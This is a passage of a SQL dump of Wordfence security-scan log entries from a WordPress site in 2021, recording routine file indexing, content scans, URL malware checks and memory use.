128.54 MB of data so far'),(3697,1630101577.036479,2,'info','Analyzed 5898 files containing 130.16 MB of data.'),(3707,1630101580.135283,2,'info','Starting scan of file contents'),(3708,1630101581.173827,2,'info','Scanned contents of 53 additional files at 52.11 per second'),(3709,1630101582.174077,2,'info','Scanned contents of 100 additional files at 49.57 per second'),(3710,1630101583.187861,2,'info','Scanned contents of 134 additional files at 44.21 per second'),(3711,1630101584.341623,2,'info','Scanned contents of 170 additional files at 40.62 per second'),(3712,1630101585.781435,2,'info','Scanned contents of 173 additional files at 30.76 per second'),(3713,1630101586.794812,2,'info','Scanned contents of 232 additional files at 34.95 per second'),(3714,1630101587.818511,2,'info','Scanned contents of 262 additional files at 34.20 per second'),(3715,1630101588.834147,2,'info','Scanned contents of 286 additional files at 32.96 per second'),(3716,1630101589.834831,2,'info','Scanned contents of 314 additional files at 32.44 per second'),(3717,1630101590.868349,2,'info','Scanned contents of 365 additional files at 34.08 per second'),(3718,1630101591.889242,2,'info','Scanned contents of 398 additional files at 33.92 per second'),(3719,1630101592.922985,2,'info','Scanned contents of 430 additional files at 33.68 per second'),(3720,1630101594.129653,2,'info','Scanned contents of 448 additional files at 32.06 per second'),(3721,1630101595.144691,2,'info','Scanned contents of 487 additional files at 32.49 per second'),(3722,1630101595.718944,2,'info','Scanned contents of 524 additional files at 33.67 per second'),(3723,1630101595.721197,2,'info','Asking Wordfence to check URLs against malware list.'),(3724,1630101595.723732,2,'info','Checking 277 host keys against Wordfence scanning servers.'),(3725,1630101596.327327,2,'info','Done host key check.'),(3726,1630101596.529004,2,'info','Done file contents scan'),(3732,1630101597.242874,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3733,1630101597.247486,2,'info','Checking 236 host keys against Wordfence scanning servers.'),(3734,1630101597.834517,2,'info','Done host key check.'),(3735,1630101598.044004,2,'info','Done examining URLs'),(3740,1630101598.551237,2,'info','Starting password strength check on 1 user.'),(3747,1630101603.837111,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3748,1630101603.839279,2,'info','Done examining URLs'),(3750,1630101603.933981,1,'info','-------------------'),(3751,1630101603.936216,2,'info','Wordfence used 17.48 MB of memory for scan. Server peak memory usage was: 43.48 MB'),(3752,1630101603.959429,1,'info','Scan Complete. Scanned 5898 files, 8 plugins, 4 themes, 19 posts, 0 comments and 800 URLs in 7 minutes 2 seconds.'),(3755,1630155307.830587,1,'info','Initiating quick scan'),(3760,1630155308.067295,1,'info','-------------------'),(3761,1630155308.071513,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(3762,1630155308.077732,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3765,1630241606.331097,1,'info','Initiating quick scan'),(3770,1630241606.493489,1,'info','-------------------'),(3771,1630241606.513995,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(3772,1630241606.524508,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3775,1630328026.557671,1,'info','Initiating quick scan'),(3780,1630328026.753430,1,'info','-------------------'),(3781,1630328026.774734,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(3782,1630328026.785241,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3784,1630360609.431020,1,'info','Scheduled Wordfence scan starting at Monday 30th of August 2021 09:56:49 PM'),(3786,1630360609.943088,1,'info','Contacting Wordfence to initiate scan'),(3793,1630360617.304446,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(3794,1630360617.315090,2,'info','The disk has 3458635.39 MB available'),(3802,1630360617.623233,2,'info','Including files that are outside the WordPress installation in the scan.'),(3803,1630360617.654623,2,'info','Getting plugin list from WordPress'),(3804,1630360617.675344,2,'info','Found 7 plugins'),(3805,1630360617.684392,2,'info','Getting theme list from WordPress'),(3806,1630360617.747713,2,'info','Found 4 themes'),(3818,1630360619.843849,2,'info','500 files indexed'),(3819,1630360619.963987,2,'info','1000 files indexed'),(3820,1630360620.060059,2,'info','1500 files indexed'),(3821,1630360620.162596,2,'info','2000 files indexed'),(3822,1630360620.254559,2,'info','2500 files indexed'),(3823,1630360620.335611,2,'info','3000 files indexed'),(3824,1630360620.472221,2,'info','3500 files indexed'),(3825,1630360620.508138,2,'info','4000 files indexed'),(3826,1630360620.551533,2,'info','4500 files indexed'),(3827,1630360620.592059,2,'info','5000 files indexed'),(3828,1630360620.634506,2,'info','5500 files indexed'),(3829,1630360620.696404,2,'info','5898 files indexed'),(3830,1630360624.964148,2,'info','Analyzed 100 files containing 1.6 MB of data so far'),(3831,1630360628.792630,2,'info','Analyzed 200 files containing 2.8 MB of data so far'),(3832,1630360631.818499,2,'info','Analyzed 300 files containing 3.98 MB of data so far'),(3833,1630360634.738484,2,'info','Analyzed 400 files containing 6.77 MB of data so far'),(3834,1630360638.418676,2,'info','Analyzed 500 files containing 7.67 MB of data so far'),(3835,1630360643.947889,2,'info','Analyzed 600 files containing 9.49 MB of data so far'),(3836,1630360647.759519,2,'info','Analyzed 700 files containing 11.62 MB of data so far'),(3837,1630360651.382742,2,'info','Analyzed 800 files containing 15.71 MB of data so far'),(3838,1630360654.167538,2,'info','Analyzed 900 files containing 18.57 MB of data so far'),(3839,1630360656.987687,2,'info','Analyzed 1000 files containing 22.1 MB of data so far'),(3840,1630360662.182109,2,'info','Analyzed 1100 files containing 22.8 MB of data so far'),(3841,1630360665.740264,2,'info','Analyzed 1200 files containing 24.47 MB of data so far'),(3842,1630360669.168039,2,'info','Analyzed 1300 files containing 30.54 MB of data so far'),(3843,1630360672.534161,2,'info','Analyzed 1400 files containing 32.66 MB of data so far'),(3844,1630360675.866406,2,'info','Analyzed 1500 files containing 33.25 MB of data so far'),(3845,1630360680.980133,2,'info','Analyzed 1600 files containing 34.64 MB of data so far'),(3846,1630360684.527849,2,'info','Analyzed 1700 files containing 35.09 MB of data so far'),(3847,1630360686.890316,2,'info','Analyzed 1800 files containing 35.51 MB of data so far'),(3848,1630360689.428793,2,'info','Analyzed 1900 files containing 35.83 MB of data so far'),(3849,1630360692.988409,2,'info','Analyzed 2000 files containing 36.36 MB of data so far'),(3850,1630360697.561632,2,'info','Analyzed 2100 files containing 38.47 MB of data so far'),(3851,1630360699.778932,2,'info','Analyzed 2200 files containing 41.87 MB of data so far'),(3852,1630360701.867525,2,'info','Analyzed 2300 files containing 44.21 MB of data so far'),(3853,1630360703.869760,2,'info','Analyzed 2400 files containing 45.13 MB of data so far'),(3854,1630360707.843732,2,'info','Analyzed 2500 files containing 45.32 MB of data so far'),(3855,1630360709.612942,2,'info','Analyzed 2600 files containing 45.8 MB of data so far'),(3856,1630360713.450744,2,'info','Analyzed 2700 files containing 46.11 MB of data so far'),(3857,1630360717.233396,2,'info','Analyzed 2800 files containing 46.36 MB of data so far'),(3858,1630360720.432358,2,'info','Analyzed 2900 files containing 46.93 MB of data so far'),(3859,1630360724.155130,2,'info','Analyzed 3000 files containing 47.68 MB of data so far'),(3860,1630360727.524676,2,'info','Analyzed 3100 files containing 47.89 MB of data so far'),(3861,1630360731.120079,2,'info','Analyzed 3200 files containing 47.93 MB of data so far'),(3862,1630360734.144718,2,'info','Analyzed 3300 files containing 48.4 MB of data so far'),(3863,1630360738.030288,2,'info','Analyzed 3400 files containing 52.93 MB of data so far'),(3864,1630360741.136570,2,'info','Analyzed 3500 files containing 54.51 MB of data so far'),(3865,1630360744.817152,2,'info','Analyzed 3600 files containing 57.96 MB of data so far'),(3866,1630360746.517392,2,'info','Analyzed 3700 files containing 59.04 MB of data so far'),(3867,1630360748.814674,2,'info','Analyzed 3800 files containing 63.78 MB of data so far'),(3868,1630360752.657097,2,'info','Analyzed 3900 files containing 70.45 MB of data so far'),(3869,1630360760.128866,2,'info','Analyzed 4000 files containing 76.18 MB of data so far'),(3870,1630360762.642025,2,'info','Analyzed 4100 files containing 81.89 MB of data so far'),(3871,1630360766.468880,2,'info','Analyzed 4200 files containing 88.28 MB of data so far'),(3872,1630360770.211225,2,'info','Analyzed 4300 files containing 96.15 MB of data so far'),(3873,1630360773.873183,2,'info','Analyzed 4400 files containing 96.83 MB of data so far'),(3874,1630360777.310971,2,'info','Analyzed 4500 files containing 97.06 MB of data so far'),(3875,1630360780.578049,2,'info','Analyzed 4600 files containing 97.21 MB of data so far'),(3876,1630360783.910313,2,'info','Analyzed 4700 files containing 97.33 MB of data so far'),(3877,1630360786.086163,2,'info','Analyzed 4800 files containing 97.61 MB of data so far'),(3878,1630360790.987306,2,'info','Analyzed 4900 files containing 99.6 MB of data so far'),(3879,1630360793.897353,2,'info','Analyzed 5000 files containing 102.56 MB of data so far'),(3880,1630360796.804758,2,'info','Analyzed 5100 files containing 104.41 MB of data so far'),(3881,1630360800.524206,2,'info','Analyzed 5200 files containing 106.02 MB of data so far'),(3882,1630360803.878857,2,'info','Analyzed 5300 files containing 115.91 MB of data so far'),(3883,1630360808.315463,2,'info','Analyzed 5400 files containing 119.27 MB of data so far'),(3884,1630360812.093418,2,'info','Analyzed 5500 files containing 121.5 MB of data so far'),(3885,1630360818.156141,2,'info','Analyzed 5600 files containing 124.39 MB of data so far'),(3886,1630360821.833776,2,'info','Analyzed 5700 files containing 127.25 MB of data so far'),(3887,1630360825.775701,2,'info','Analyzed 5800 files containing 128.55 MB of data so far'),(3888,1630360828.201468,2,'info','Analyzed 5898 files containing 130.17 MB of data.'),(3898,1630360830.563351,2,'info','Starting scan of file contents'),(3899,1630360831.664025,2,'info','Scanned contents of 28 additional files at 26.08 per second'),(3900,1630360832.687678,2,'info','Scanned contents of 53 additional files at 25.27 per second'),(3901,1630360833.721072,2,'info','Scanned contents of 62 additional files at 19.80 per second'),(3902,1630360834.746818,2,'info','Scanned contents of 132 additional files at 31.76 per second'),(3903,1630360835.750636,2,'info','Scanned contents of 187 additional files at 36.24 per second'),(3904,1630360836.777496,2,'info','Scanned contents of 231 additional files at 37.34 per second'),(3905,1630360837.801201,2,'info','Scanned contents of 241 additional files at 33.42 per second'),(3906,1630360838.809891,2,'info','Scanned contents of 294 additional files at 35.77 per second'),(3907,1630360839.813591,2,'info','Scanned contents of 326 additional files at 35.35 per second'),(3908,1630360840.826842,2,'info','Scanned contents of 370 additional files at 36.15 per second'),(3909,1630360841.829804,2,'info','Scanned contents of 397 additional files at 35.32 per second'),(3910,1630360842.896628,2,'info','Scanned contents of 428 additional files at 34.78 per second'),(3911,1630360843.914464,2,'info','Scanned contents of 465 additional files at 34.90 per second'),(3912,1630360844.931814,2,'info','Scanned contents of 475 additional files at 33.12 per second'),(3913,1630360845.958248,2,'info','Scanned contents of 505 additional files at 32.86 per second'),(3914,1630360846.639775,2,'info','Scanned contents of 524 additional files at 32.65 per second'),(3915,1630360846.650672,2,'info','Asking Wordfence to check URLs against malware list.'),(3916,1630360846.662185,2,'info','Checking 277 host keys against Wordfence scanning servers.'),(3917,1630360847.296446,2,'info','Done host key check.'),(3918,1630360847.444843,2,'info','Done file contents scan'),(3924,1630360848.262491,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3925,1630360848.270998,2,'info','Checking 236 host keys against Wordfence scanning servers.'),(3926,1630360848.895680,2,'info','Done host key check.'),(3927,1630360848.901679,2,'info','Done examining URLs'),(3932,1630360849.536708,2,'info','Starting password strength check on 1 user.'),(3939,1630360854.696448,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3940,1630360854.702477,2,'info','Done examining URLs'),(3942,1630360854.758099,1,'info','-------------------'),(3943,1630360854.760332,2,'info','Wordfence used 17.5 MB of memory for scan. Server peak memory usage was: 43.5 MB'),(3944,1630360854.762342,1,'info','Scan Complete. Scanned 5898 files, 8 plugins, 4 themes, 19 posts, 0 comments and 800 URLs in 4 minutes 4 seconds.'),(3947,1630414417.439688,1,'info','Initiating quick scan'),(3952,1630414417.641438,1,'info','-------------------'),(3953,1630414417.663897,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(3954,1630414417.674707,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3957,1630500799.046246,1,'info','Initiating quick scan'),(3962,1630500799.723652,1,'info','-------------------'),(3963,1630500799.748687,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(3964,1630500799.757335,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3967,1630587287.523448,1,'info','Initiating quick scan'),(3972,1630587287.670006,1,'info','-------------------'),(3973,1630587287.682650,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(3974,1630587287.693051,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3976,1630619419.733295,1,'info','Scheduled Wordfence scan starting at Thursday 2nd of September 2021 09:50:19 PM'),(3978,1630619421.174271,1,'info','Contacting Wordfence to initiate scan'),(3985,1630619431.798815,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(3986,1630619431.800629,2,'info','The disk has 3458832.68 MB available'),(3994,1630619431.888387,2,'info','Including files that are outside the WordPress installation in the scan.'),(3995,1630619431.898341,2,'info','Getting plugin list from WordPress'),(3996,1630619431.911100,2,'info','Found 7 plugins'),(3997,1630619431.912961,2,'info','Getting theme list from WordPress'),(3998,1630619431.961925,2,'info','Found 4 themes'),(4010,1630619434.066454,2,'info','500 files indexed'),(4011,1630619434.253226,2,'info','1000 files indexed'),(4012,1630619434.420633,2,'info','1500 files indexed'),(4013,1630619434.596591,2,'info','2000 files indexed'),(4014,1630619434.715117,2,'info','2500 files indexed'),(4015,1630619434.907266,2,'info','3000 files indexed'),(4016,1630619434.961888,2,'info','3500 files indexed'),(4017,1630619435.060394,2,'info','4000 files indexed'),(4018,1630619435.248267,2,'info','4500 files indexed'),(4019,1630619435.363065,2,'info','5000 files indexed'),(4020,1630619435.459897,2,'info','5500 files indexed'),(4021,1630619435.621923,2,'info','5898 files indexed'),(4022,1630619439.011562,2,'info','Analyzed 100 files containing 1.6 MB of data so far'),(4023,1630619442.320734,2,'info','Analyzed 200 files containing 2.8 MB of data so far'),(4024,1630619447.375234,2,'info','Analyzed 300 files containing 3.98 MB of data so far'),(4025,1630619450.332658,2,'info','Analyzed 400 files containing 6.77 MB of data so far'),(4026,1630619453.539892,2,'info','Analyzed 500 files containing 7.67 MB of data so far'),(4027,1630619457.219400,2,'info','Analyzed 600 files containing 9.49 MB of data so far'),(4028,1630619460.244434,2,'info','Analyzed 700 files containing 11.62 MB of data so far'),(4029,1630619463.846501,2,'info','Analyzed 800 files containing 15.71 MB of data so far'),(4030,1630619467.324904,2,'info','Analyzed 900 files containing 18.57 MB of data so far'),(4031,1630619470.747257,2,'info','Analyzed 1000 files containing 22.1 MB of data so far'),(4032,1630619474.924749,2,'info','Analyzed 1100 files containing 22.8 MB of data so far'),(4033,1630619478.439794,2,'info','Analyzed 1200 files containing 24.47 MB of data so far'),(4034,1630619482.445056,2,'info','Analyzed 1300 files containing 30.54 MB of data so far'),(4035,1630619485.592747,2,'info','Analyzed 1400 files containing 32.66 MB of data so far'),(4036,1630619489.147187,2,'info','Analyzed 1500 files containing 33.25 MB of data so far'),(4037,1630619491.878889,2,'info','Analyzed 1600 files containing 34.64 MB of data so far'),(4038,1630619494.888860,2,'info','Analyzed 1700 files containing 35.09 MB of data so far'),(4039,1630619497.770859,2,'info','Analyzed 1800 files containing 35.52 MB of data so far'),(4040,1630619499.134490,2,'info','Analyzed 1900 files containing 35.83 MB of data so far'),(4041,1630619502.828442,2,'info','Analyzed 2000 files containing 36.36 MB of data so far'),(4042,1630619506.007084,2,'info','Analyzed 2100 files containing 38.47 MB of data so far'),(4043,1630619508.555306,2,'info','Analyzed 2200 files containing 41.87 MB of data so far'),(4044,1630619511.852301,2,'info','Analyzed 2300 files containing 44.21 MB of data so far'),(4045,1630619514.944917,2,'info','Analyzed 2400 files containing 45.13 MB of data so far'),(4046,1630619518.807276,2,'info','Analyzed 2500 files containing 45.32 MB of data so far'),(4047,1630619521.433746,2,'info','Analyzed 2600 files containing 45.8 MB of data so far'),(4048,1630619525.848115,2,'info','Analyzed 2700 files containing 46.11 MB of data so far'),(4049,1630619528.284090,2,'info','Analyzed 2800 files containing 46.36 MB of data so far'),(4050,1630619530.971716,2,'info','Analyzed 2900 files containing 46.93 MB of data so far'),(4051,1630619533.934598,2,'info','Analyzed 3000 files containing 47.68 MB of data so far'),(4052,1630619538.387470,2,'info','Analyzed 3100 files containing 47.89 MB of data so far'),(4053,1630619541.845507,2,'info','Analyzed 3200 files containing 47.93 MB of data so far'),(4054,1630619545.558129,2,'info','Analyzed 3300 files containing 48.4 MB of data so far'),(4055,1630619549.244725,2,'info','Analyzed 3400 files containing 52.93 MB of data so far'),(4056,1630619555.475809,2,'info','Analyzed 3500 files containing 54.52 MB of data so far'),(4057,1630619557.978886,2,'info','Analyzed 3600 files containing 57.96 MB of data so far'),(4058,1630619560.657285,2,'info','Analyzed 3700 files containing 59.04 MB of data so far'),(4059,1630619563.625755,2,'info','Analyzed 3800 files containing 63.78 MB of data so far'),(4060,1630619567.399053,2,'info','Analyzed 3900 files containing 70.45 MB of data so far'),(4061,1630619570.442236,2,'info','Analyzed 4000 files containing 76.18 MB of data so far'),(4062,1630619572.789712,2,'info','Analyzed 4100 files containing 81.89 MB of data so far'),(4063,1630619575.274825,2,'info','Analyzed 4200 files containing 88.28 MB of data so far'),(4064,1630619578.349066,2,'info','Analyzed 4300 files containing 96.15 MB of data so far'),(4065,1630619581.596450,2,'info','Analyzed 4400 files containing 96.83 MB of data so far'),(4066,1630619585.262393,2,'info','Analyzed 4500 files containing 97.06 MB of data so far'),(4067,1630619588.407371,2,'info','Analyzed 4600 files containing 97.21 MB of data so far'),(4068,1630619591.278474,2,'info','Analyzed 4700 files containing 97.33 MB of data so far'),(4069,1630619593.467938,2,'info','Analyzed 4800 files containing 97.61 MB of data so far'),(4070,1630619596.869198,2,'info','Analyzed 4900 files containing 99.6 MB of data so far'),(4071,1630619600.842299,2,'info','Analyzed 5000 files containing 102.56 MB of data so far'),(4072,1630619604.368998,2,'info','Analyzed 5100 files containing 104.41 MB of data so far'),(4073,1630619608.300125,2,'info','Analyzed 5200 files containing 106.02 MB of data so far'),(4074,1630619611.736744,2,'info','Analyzed 5300 files containing 115.92 MB of data so far'),(4075,1630619616.034472,2,'info','Analyzed 5400 files containing 119.27 MB of data so far'),(4076,1630619619.516953,2,'info','Analyzed 5500 files containing 121.5 MB of data so far'),(4077,1630619622.997465,2,'info','Analyzed 5600 files containing 124.39 MB of data so far'),(4078,1630619626.605339,2,'info','Analyzed 5700 files containing 127.25 MB of data so far'),(4079,1630619630.914482,2,'info','Analyzed 5800 files containing 128.55 MB of data so far'),(4080,1630619634.821193,2,'info','Analyzed 5898 files containing 130.17 MB of data.'),(4090,1630619637.381426,2,'info','Starting scan of file contents'),(4091,1630619638.450765,2,'info','Scanned contents of 38 additional files at 36.51 per second'),(4092,1630619639.499380,2,'info','Scanned contents of 83 additional files at 39.72 per second'),(4093,1630619640.507154,2,'info','Scanned contents of 118 additional files at 38.10 per second'),(4094,1630619641.507631,2,'info','Scanned contents of 163 additional files at 39.78 per second'),(4095,1630619642.526353,2,'info','Scanned contents of 194 additional files at 37.92 per second'),(4096,1630619643.527405,2,'info','Scanned contents of 225 additional files at 36.78 per second'),(4097,1630619644.536510,2,'info','Scanned contents of 258 additional files at 36.20 per second'),(4098,1630619645.674147,2,'info','Scanned contents of 291 additional files at 35.21 per second'),(4099,1630619647.222514,2,'info','Scanned contents of 296 additional files at 30.17 per second'),(4100,1630619648.235014,2,'info','Scanned contents of 321 additional files at 29.65 per second'),(4101,1630619649.257432,2,'info','Scanned contents of 350 additional files at 29.54 per second'),(4102,1630619650.266524,2,'info','Scanned contents of 383 additional files at 29.79 per second'),(4103,1630619651.273193,2,'info','Scanned contents of 413 additional files at 29.79 per second'),(4104,1630619652.437911,2,'info','Scanned contents of 439 additional files at 29.21 per second'),(4105,1630619653.470327,2,'info','Scanned contents of 451 additional files at 28.08 per second'),(4106,1630619654.687987,2,'info','Scanned contents of 472 additional files at 27.32 per second'),(4107,1630619655.690690,2,'info','Scanned contents of 505 additional files at 27.62 per second'),(4108,1630619656.016361,2,'info','Scanned contents of 524 additional files at 28.16 per second'),(4109,1630619656.026417,2,'info','Asking Wordfence to check URLs against malware list.'),(4110,1630619656.028840,2,'info','Checking 277 host keys against Wordfence scanning servers.'),(4111,1630619656.651293,2,'info','Done host key check.'),(4112,1630619656.720383,2,'info','Done file contents scan'),(4118,1630619657.106387,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(4119,1630619657.118097,2,'info','Checking 236 host keys against Wordfence scanning servers.'),(4120,1630619657.719057,2,'info','Done host key check.'),(4121,1630619657.737391,2,'info','Done examining URLs'),(4126,1630619658.074178,2,'info','Starting password strength check on 1 user.'),(4133,1630619661.924321,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(4134,1630619661.927264,2,'info','Done examining URLs'),(4136,1630619662.108701,1,'info','-------------------'),(4137,1630619662.110914,2,'info','Wordfence used 17.53 MB of memory for scan. Server peak memory usage was: 43.53 MB'),(4138,1630619662.127921,1,'info','Scan Complete. Scanned 5898 files, 8 plugins, 4 themes, 19 posts, 0 comments and 800 URLs in 4 minutes.'),(4141,1630673600.749606,1,'info','Initiating quick scan'),(4146,1630673601.189938,1,'info','-------------------'),(4147,1630673601.266283,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(4148,1630673601.274281,1,'info','Quick Scan Complete. Scanned in 1 second.'),(4151,1630760066.455511,1,'info','Initiating quick scan'),(4156,1630760066.690649,1,'info','-------------------'),(4157,1630760066.717994,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(4158,1630760066.728510,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4161,1630846459.383890,1,'info','Initiating quick scan'),(4166,1630846459.499996,1,'info','-------------------'),(4167,1630846459.517061,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(4168,1630846459.519865,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4170,1630878639.408483,1,'info','Scheduled Wordfence scan starting at Sunday 5th of September 2021 09:50:39 PM'),(4172,1630878640.578496,1,'info','Contacting Wordfence to initiate scan'),(4179,1630878647.845719,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(4180,1630878647.849549,2,'info','The disk has 3459013.82 MB available'),(4188,1630878648.087045,2,'info','Including files that are outside the WordPress installation in the scan.'),(4189,1630878648.107949,2,'info','Getting plugin list from WordPress'),(4190,1630878648.119562,2,'info','Found 7 plugins'),(4191,1630878648.128118,2,'info','Getting theme list from WordPress'),(4192,1630878648.189821,2,'info','Found 4 themes'),(4204,1630878651.144951,2,'info','500 files indexed'),(4205,1630878651.324302,2,'info','1000 files indexed'),(4206,1630878651.681631,2,'info','1500 files indexed'),(4207,1630878651.828220,2,'info','2000 files indexed'),(4208,1630878652.039195,2,'info','2500 files indexed'),(4209,1630878652.249417,2,'info','3000 files indexed'),(4210,1630878652.445850,2,'info','3500 files indexed'),(4211,1630878652.676941,2,'info','4000 files indexed'),(4212,1630878652.853304,2,'info','4500 files indexed'),(4213,1630878653.023936,2,'info','5000 files indexed'),(4214,1630878653.217582,2,'info','5500 files indexed'),(4215,1630878653.385407,2,'info','5898 files indexed'),(4216,1630878659.675885,2,'info','Analyzed 100 files containing 1.6 MB of data so far'),(4217,1630878665.702537,2,'info','Analyzed 200 files containing 2.8 MB of data so far'),(4218,1630878673.173648,2,'info','Analyzed 300 files containing 3.98 MB of data so far'),(4219,1630878679.908376,2,'info','Analyzed 400 files containing 6.77 MB of data so far'),(4220,1630878685.981882,2,'info','Analyzed 500 files containing 7.67 MB of data so far'),(4221,1630878692.107759,2,'info','Analyzed 600 files containing 9.49 MB of data so far'),(4222,1630878697.886508,2,'info','Analyzed 700 files containing 11.62 MB of data so far'),(4223,1630878703.615018,2,'info','Analyzed 800 files containing 15.71 MB of data so far'),(4224,1630878710.794416,2,'info','Analyzed 900 files containing 18.57 MB of data so far'),(4225,1630878716.711092,2,'info','Analyzed 1000 files containing 22.1 MB of data so far'),(4226,1630878724.203096,2,'info','Analyzed 1100 files containing 22.8 MB of data so far'),(4227,1630878731.347725,2,'info','Analyzed 1200 files containing 24.47 MB of data so far'),(4228,1630878739.807740,2,'info','Analyzed 1300 files containing 30.54 MB of data so far'),(4229,1630878745.954318,2,'info','Analyzed 1400 files containing 32.66 MB of data so far'),(4230,1630878752.701217,2,'info','Analyzed 1500 files containing 33.25 MB of data so far'),(4231,1630878761.462057,2,'info','Analyzed 1600 files containing 34.64 MB of data so far'),(4232,1630878766.826421,2,'info','Analyzed 1700 files containing 35.09 MB of data so far'),(4233,1630878773.537952,2,'info','Analyzed 1800 files containing 35.52 MB of data so far'),(4234,1630878780.292059,2,'info','Analyzed 1900 files containing 35.83 MB of data so far'),(4235,1630878787.924746,2,'info','Analyzed 2000 files containing 36.36 MB of data so far'),(4236,1630878795.401577,2,'info','Analyzed 2100 files containing 38.47 MB of data so far'),(4237,1630878802.317628,2,'info','Analyzed 2200 files containing 41.87 MB of data so far'),(4238,1630878809.600488,2,'info','Analyzed 2300 files containing 44.21 MB of data so far'),(4239,1630878815.760132,2,'info','Analyzed 2400 files containing 45.13 MB of data so far'),(4240,1630878823.390768,2,'info','Analyzed 2500 files containing 45.32 MB of data so far'),(4241,1630878829.839054,2,'info','Analyzed 2600 files containing 45.8 MB of data so far'),(4242,1630878836.593085,2,'info','Analyzed 2700 files containing 46.11 MB of data so far'),(4243,1630878843.054234,2,'info','Analyzed 2800 files containing 46.36 MB of data so far'),(4244,1630878850.393011,2,'info','Analyzed 2900 files containing 46.93 MB of data so far'),(4245,1630878856.866006,2,'info','Analyzed 3000 files containing 47.68 MB of data so far'),(4246,1630878863.562703,2,'info','Analyzed 3100 files containing 47.89 MB of data so far'),(4247,1630878869.716512,2,'info','Analyzed 3200 files containing 47.93 MB of data so far'),(4248,1630878877.431129,2,'info','Analyzed 3300 files containing 48.4 MB of data so far'),(4249,1630878884.724818,2,'info','Analyzed 3400 files containing 52.93 MB of data so far'),(4250,1630878889.220143,2,'info','Analyzed 3500 files containing 54.52 MB of data so far'),(4251,1630878894.510314,2,'info','Analyzed 3600 files containing 57.96 MB of data so far'),(4252,1630878901.808024,2,'info','Analyzed 3700 files containing 59.04 MB of data so far'),(4253,1630878907.993451,2,'info','Analyzed 3800 files containing 63.78 MB of data so far'),(4254,1630878915.969039,2,'info','Analyzed 3900 files containing 70.45 MB of data so far'),(4255,1630878922.855619,2,'info','Analyzed 4000 files containing 76.18 MB of data so far'),(4256,1630878931.299837,2,'info','Analyzed 4100 files containing 81.89 MB of data so far'),(4257,1630878938.129558,2,'info','Analyzed 4200 files containing 88.28 MB of data so far'),(4258,1630878944.712363,2,'info','Analyzed 4300 files containing 96.15 MB of data so far'),(4259,1630878951.961337,2,'info','Analyzed 4400 files containing 96.83 MB of data so far'),(4260,1630878958.305777,2,'info','Analyzed 4500 files containing 97.06 MB of data so far'),(4261,1630878963.454977,2,'info','Analyzed 4600 files containing 97.21 MB of data so far'),(4262,1630878968.583613,2,'info','Analyzed 4700 files containing 97.33 MB of data so far'),(4263,1630878971.855721,2,'info','Analyzed 4800 files containing 97.61 MB of data so far'),(4264,1630878975.936365,2,'info','Analyzed 4900 files containing 99.6 MB of data so far'),(4265,1630878979.875830,2,'info','Analyzed 5000 files containing 102.56 MB of data so far'),(4266,1630878985.987678,2,'info','Analyzed 5100 files containing 104.41 MB of data so far'),(4267,1630878989.917106,2,'info','Analyzed 5200 files containing 106.02 MB of data so far'),(4268,1630878993.622827,2,'info','Analyzed 5300 files containing 115.92 MB of data so far'),(4269,1630878996.783644,2,'info','Analyzed 5400 files containing 119.27 MB of data so far'),(4270,1630879000.528966,2,'info','Analyzed 5500 files containing 121.5 MB of data so far'),(4271,1630879004.303315,2,'info','Analyzed 5600 files containing 124.39 MB of data so far'),(4272,1630879007.574866,2,'info','Analyzed 5700 files containing 127.25 MB of data so far'),(4273,1630879010.840118,2,'info','Analyzed 5800 files containing 128.55 MB of data so far'),(4274,1630879013.679725,2,'info','Analyzed 5898 files containing 130.17 MB of data.'),(4284,1630879016.114323,2,'info','Starting scan of file contents'),(4285,1630879017.150678,2,'info','Scanned contents of 28 additional files at 27.60 per second'),(4286,1630879018.155336,2,'info','Scanned contents of 94 additional files at 46.56 per second'),(4287,1630879019.171514,2,'info','Scanned contents of 139 additional files at 45.80 per second'),(4288,1630879020.172187,2,'info','Scanned contents of 175 additional files at 43.36 per second'),(4289,1630879021.184089,2,'info','Scanned contents of 231 additional files at 45.76 per second'),(4290,1630879022.195146,2,'info','Scanned contents of 286 additional files at 47.20 per second'),(4291,1630879023.204824,2,'info','Scanned contents of 321 additional files at 45.41 per second'),(4292,1630879024.215154,2,'info','Scanned contents of 359 additional files at 44.44 per second'),(4293,1630879025.729014,2,'info','Scanned contents of 382 additional files at 39.82 per second'),(4294,1630879026.742278,2,'info','Scanned contents of 414 additional files at 39.03 per second'),(4295,1630879027.770045,2,'info','Scanned contents of 441 additional files at 37.91 per second'),(4296,1630879028.774355,2,'info','Scanned contents of 471 additional files at 37.27 per second'),(4297,1630879029.790617,2,'info','Scanned contents of 499 additional files at 36.55 per second'),(4298,1630879030.634645,2,'info','Scanned contents of 524 additional files at 36.14 per second'),(4299,1630879030.645176,2,'info','Asking Wordfence to check URLs against malware list.'),(4300,1630879030.656041,2,'info','Checking 277 host keys against Wordfence scanning servers.'),(4301,1630879031.287933,2,'info','Done host key check.'),(4302,1630879031.440605,2,'info','Done file contents scan'),(4308,1630879031.881451,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(4309,1630879031.885226,2,'info','Checking 236 host keys against 